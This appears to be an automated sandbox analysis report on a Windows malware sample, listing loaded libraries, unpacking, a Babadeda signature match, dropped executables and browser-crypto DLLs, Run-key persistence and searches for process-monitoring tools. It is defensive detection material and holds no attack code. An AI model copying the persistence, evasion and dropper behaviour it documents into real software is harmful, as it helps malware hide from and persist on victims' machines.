Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: slc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Docs.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.27.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Unpacked PE file: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Unpacked PE file: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 10.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 14.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 15.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 20.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack
Yara detected Babadeda
Source: Yara match File source: 24.0.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\1000003002\ee7a49fbf0.exe, type: DROPPED
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: ee7a49fbf0.exe.19.dr Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: axplong.exe.5.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: random[1].exe0.19.dr Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: enter[1].exe.0.dr Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .xipewav
Source: file.exe Static PE information: section name: .gata
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: qzeqbxes
Source: random[1].exe.0.dr Static PE information: section name: qgghuozc
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qzeqbxes
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qgghuozc
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .taggant
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: usoriijt
Source: enter[1].exe.0.dr Static PE information: section name: ymfuwjgb
Source: enter[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: usoriijt
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: ymfuwjgb
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .taggant
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: qzeqbxes
Source: axplong.exe.5.dr Static PE information: section name: qgghuozc
Source: axplong.exe.5.dr Static PE information: section name: .taggant
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: usoriijt
Source: explorti.exe.8.dr Static PE information: section name: ymfuwjgb
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.19.dr Static PE information: section name: .xipewav
Source: random[1].exe.19.dr Static PE information: section name: .gata
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .xipewav
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .gata
Source: random[1].exe0.19.dr Static PE information: section name: .code
Source: ee7a49fbf0.exe.19.dr Static PE information: section name: .code
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB536 push ecx; ret 0_2_6C5BB549
Source: file.exe Static PE information: section name: .text entropy: 7.816119789832956
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.978158442993088
Source: random[1].exe.0.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: entropy: 7.978158442993088
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: enter[1].exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: enter[1].exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: axplong.exe.5.dr Static PE information: section name: entropy: 7.978158442993088
Source: axplong.exe.5.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.983026486073879
Source: explorti.exe.8.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: random[1].exe.19.dr Static PE information: section name: .text entropy: 7.816119789832956
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .text entropy: 7.816119789832956
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\1000003002\ee7a49fbf0.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
